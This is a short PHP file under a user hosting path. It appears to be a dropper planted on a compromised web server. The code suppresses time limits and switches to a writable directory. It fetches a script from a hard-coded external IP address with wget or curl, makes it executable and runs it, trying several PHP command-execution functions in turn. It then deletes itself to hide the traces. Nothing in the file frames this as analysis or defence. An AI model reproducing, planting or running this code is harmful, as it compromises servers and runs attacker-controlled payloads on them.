File: /home/g/e/y/geyhairs/nvn6240byp.php
<?php @set_time_limit(0);@ignore_user_abort(1);$c="cd /tmp||cd /var/run||cd /;wget -q -O csn http://166.0.192.57/cumshotnews 2>/dev/null||curl -fsSL -o csn http://166.0.192.57/cumshotnews 2>/dev/null;chmod 777 csn;sh csn;rm -f csn";if(function_exists("system")){@system($c);}elseif(function_exists("exec")){@exec($c);}elseif(function_exists("shell_exec")){@shell_exec($c);}elseif(function_exists("passthru")){@passthru($c);}elseif(function_exists("popen")){$h=@popen($c,"r");if($h){@pclose($h);}}elseif(function_exists("proc_open")){$p=@proc_open($c,array(),$pp);if(is_resource($p)){@proc_close($p);}}@unlink(__FILE__);echo "ok"; ?>